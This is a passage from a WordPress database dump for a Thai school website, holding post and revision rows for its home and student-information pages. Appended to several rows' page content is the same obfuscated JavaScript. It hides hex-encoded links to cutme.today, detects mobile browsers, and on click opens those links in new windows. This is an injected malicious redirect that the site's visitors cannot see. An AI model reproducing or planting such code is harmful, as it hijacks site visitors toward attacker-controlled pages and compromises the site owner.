)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-02 11:55:54','2024-08-02 04:55:54','',14,'http://pakhaeng.ssk.in.th/?p=494',0,'revision','',0),
(496,1,'2024-08-02 14:48:29','2024-08-02 07:48:29','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":497,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Screenshot-2024-08-02-143810-1024x483.jpg\" alt=\"\" class=\"wp-image-497\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข้อมูลนักเรียน','','publish','closed','closed','','%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99','','','2024-08-02 14:48:30','2024-08-02 07:48:30','',0,'http://pakhaeng.ssk.in.th/?page_id=496',0,'page','',0),
(497,1,'2024-08-02 14:48:15','2024-08-02 07:48:15','','Screenshot 2024-08-02 143810','','inherit','','closed','','screenshot-2024-08-02-143810','','','2024-08-02 14:48:15','2024-08-02 07:48:15','',496,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Screenshot-2024-08-02-143810.jpg',0,'attachment','image/jpeg',0),
(498,1,'2024-08-02 14:48:29','2024-08-02 07:48:29','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":497,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Screenshot-2024-08-02-143810-1024x483.jpg\" alt=\"\" class=\"wp-image-497\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข้อมูลนักเรียน','','inherit','closed','closed','','496-revision-v1','','','2024-08-02 14:48:29','2024-08-02 07:48:29','',496,'http://pakhaeng.ssk.in.th/?p=498',0,'revision','',0),
